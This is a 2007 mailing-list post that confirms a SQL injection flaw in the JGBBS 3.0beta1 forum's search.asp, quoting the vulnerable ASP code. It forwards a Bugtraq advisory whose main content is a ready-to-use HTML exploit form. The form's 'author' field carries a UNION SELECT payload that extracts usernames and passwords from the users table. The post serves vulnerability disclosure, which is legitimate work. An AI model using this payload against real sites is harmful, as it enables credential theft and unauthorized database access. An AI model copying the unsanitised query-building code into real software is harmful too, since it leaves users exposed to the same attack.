[VIM] [TRUE] JGBBS 3.0beta1 Version Search.ASP "Author" SQL Injection Exploit
Noam Rathaus
noamr at beyondsecurity.com
Wed Mar 14 16:30:48 UTC 2007
Hi,
The vulnerability is there (vulnerable code):
author = Request.QueryString("author")
bid = Request.QueryString("bid")
' Check parameters
If Not IsNumeric(bid) Then
bid = 0
End If
If CInt(bid) < 0 Then
bid = 0
End If
If title = "" And author = "" Then
Call ParseError(langErrSearchNoInput)
Call DoErrorMsg("./search.asp")
End If
' Generate SQL
sql = "SELECT * FROM posts"
If title <> "" Then
sql = sql & " WHERE post_title LIKE '%" & title & "%'"
End If
If author <> "" Then
If InStr(sql, "WHERE") <> 0 Then
sql = sql & " AND user_name='" & author & "'"
Else
sql = sql & " WHERE user_name='" & author & "'"
End If
End If
---------- Forwarded Message ----------
Subject: JGBBS 3.0beta1 Version Search.ASP "Author" SQL Injection Exploit
Date: Tuesday 13 March 2007 19:21
From: UniquE at unique-key.org
To: bugtraq at securityfocus.com
JGBBS 3.0beta1 Version Search.ASP "Author" SQL Injection Exploit
Type :
SQL Injection
Release Date :
{2007-03-13}
Product / Vendor :
JGBBS Is a Tree-style Online Forum System
http://sourceforge.net/projects/jgbbs/
Bug :
http://localhost/script/search.asp?author=-SQL Inj.-&bid=0
SQL Injection Exploit :
<title>JGBBS 3.0beta1 Version Search.ASP "Author" SQL Injection
Exploit</title> <body bgcolor="#000000">
<form name="searchFrm" method="get"
action="http://localhost/script/search.asp"> <table width="500" border="0"
align="center">
<font face="Verdana" size="2" color="#FF0000"><b>JGBBS 3.0beta1 Version
Search.ASP "Author" SQL Injection Exploit</b></font> <br>
<tr>
<td align="right"><font face="Arial" size="1" color="#00FF00">SQL
Injection Code</td> <td> </td>
<td><input name="author" type="text" value="UniquE-Key'UNION SELECT
0,1,user_password,3,4,5,user_name,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21
FROM users" class="inputbox" style="color: #000000" style="width:300px;
"></td> </tr>
<tr>
<td align="right"><font face="Arial" size="1" color="#00FF00">Search
Board</td> <td> </td>
<td>
<select name="bid">
<option value="0">(ALL)</option>
</select>
<input type="submit" value="Apply">
</td>
</tr>
</table>
</form>
<center><font face="Verdana" size="2"
color="#FF0000"><b>UniquE-Key{UniquE-Cracker}</b></font> <br>
<font face="Verdana" size="2"
color="#FF0000"><b>UniquE at UniquE-Key.ORG</b></font> <br>
<font face="Verdana" size="2"
color="#FF0000"><b>http://UniquE-Key.ORG</b></font></center>
Tested :
JGBBS 3.0beta1
Vulnerable :
JGBBS 3.0beta1
Author :
UniquE-Key{UniquE-Cracker}
UniquE(at)UniquE-Key.Org
http://www.UniquE-Key.Org
-------------------------------------------------------
--
Noam Rathaus
CTO
1616 Anderson Rd.
McLean, VA 22102
Tel: 703.286.7725 extension 105
Fax: 888.667.7740
noamr at beyondsecurity.com
http://www.beyondsecurity.com
More information about the VIM
mailing list